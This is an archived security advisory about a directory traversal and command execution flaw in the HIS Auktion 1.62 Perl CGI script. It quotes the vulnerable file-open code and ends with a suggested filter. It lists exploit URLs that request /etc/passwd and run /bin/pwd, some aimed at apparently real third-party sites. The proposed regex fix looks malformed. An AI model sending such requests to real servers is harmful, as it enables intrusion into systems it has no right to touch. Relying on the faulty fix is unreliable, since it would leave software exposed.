Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: e-commerce, shopping carts :: auktion1.htm

HIS Auktion 1.62 Directory traversal vulnerability



Vulnerability

    Auktion

Affected

    HIS Auktion 1.62

Description

    Following is  based on  a UkR  security team  advisory #8.  Script
    "HIS Auktion 1.62" is a catalog of links CGI script.  Problem:

        -------from auktion.pl-------
        sub readfile {
        local($filename)=$_0;
        local(@array);
        open(f,$filename);
        ----------------------------

    $filename - is not filterred on symbols.  Exploit:

        http://www.victim.com/cgi-bin/auktion.pl?menue=path/to/any/file/or/command
        http://www.zimmerauktion.de/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../bin/pwd
        http://www.chess-international.de/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd

Solution

    To fix  the bug  yo need  to add  variable $filename  check to the
    script.  For example:

        $filename=~s/(\[\]\;\:\/\$\!\$\&\`\\\(\)\{\}\")/\\$1/g;


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH